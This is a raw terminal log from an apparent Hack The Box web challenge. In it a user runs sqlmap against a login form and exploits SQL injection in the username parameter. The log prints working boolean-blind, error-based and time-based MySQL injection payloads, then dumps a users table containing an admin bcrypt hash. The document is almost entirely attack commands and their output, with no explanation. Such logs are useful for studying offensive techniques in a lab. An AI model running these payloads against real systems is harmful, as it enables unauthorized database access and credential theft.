┌──(sabeshan㉿kali)-[~/HTB/Challeges/Web]
└─$ sqlmap -r req.txt --batch --level=5 --ignore-code 401 -D korp_terminal --tables --dump
        ___
       __H__                                                                                                                                                 
 ___ ___[)]_____ ___ ___  {1.9.6#stable}                                                                                                                     
|_ -| . [,]     | .'| . |                                                                                                                                    
|___|_  [,]_|_|_|__,|  _|                                                                                                                                    
      |_|V...       |_|   https://sqlmap.org                                                                                                                 

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:56:12 /2025-08-27/

[10:56:12] [INFO] parsing HTTP request from 'req.txt'
[10:56:13] [INFO] resuming back-end DBMS 'mysql' 
[10:56:13] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: username=test' AND 7729=(SELECT (CASE WHEN (7729=7729) THEN 7729 ELSE (SELECT 8566 UNION SELECT 1691) END))-- -&password=test

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: username=test' OR (SELECT 3339 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(3339=3339,1))),0x717a6b6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jHir&password=test

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=test' AND (SELECT 8437 FROM (SELECT(SLEEP(5)))SJUD)-- fWXp&password=test
---
[10:56:13] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[10:56:13] [INFO] fetching tables for database: 'korp_terminal'
[10:56:14] [INFO] retrieved: 'users'
Database: korp_terminal
[1 table]
+-------+
| users |
+-------+

[10:56:14] [INFO] fetching columns for table 'users' in database 'korp_terminal'
[10:56:15] [INFO] retrieved: 'id'
[10:56:16] [INFO] retrieved: 'int(11)'
[10:56:16] [INFO] retrieved: 'username'
[10:56:17] [INFO] retrieved: 'varchar(255)'
[10:56:17] [INFO] retrieved: 'password'
[10:56:18] [INFO] retrieved: 'varchar(255)'
[10:56:18] [INFO] fetching entries for table 'users' in database 'korp_terminal'
[10:56:19] [INFO] retrieved: '1'
[10:56:19] [INFO] retrieved: '$2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv.'
[10:56:20] [INFO] retrieved: 'admin'
Database: korp_terminal
Table: users
[1 entry]
+----+--------------------------------------------------------------+----------+
| id | password                                                     | username |
+----+--------------------------------------------------------------+----------+
| 1  | $2b$12$OF1QqLVkMFUwJrl1J1YG9u6FdAQZa6ByxFt/CkS/2HW8GA563yiv. | admin    |
+----+--------------------------------------------------------------+----------+

[10:56:20] [INFO] table 'korp_terminal.users' dumped to CSV file '/home/sabeshan/.local/share/sqlmap/output/94.237.57.115/dump/korp_terminal/users.csv'
[10:56:20] [WARNING] HTTP error codes detected during run:
401 (Unauthorized) - 1 times, 500 (Internal Server Error) - 14 times
[10:56:20] [INFO] fetched data logged to text files under '/home/sabeshan/.local/share/sqlmap/output/94.237.57.115'

[*] ending @ 10:56:20 /2025-08-27/
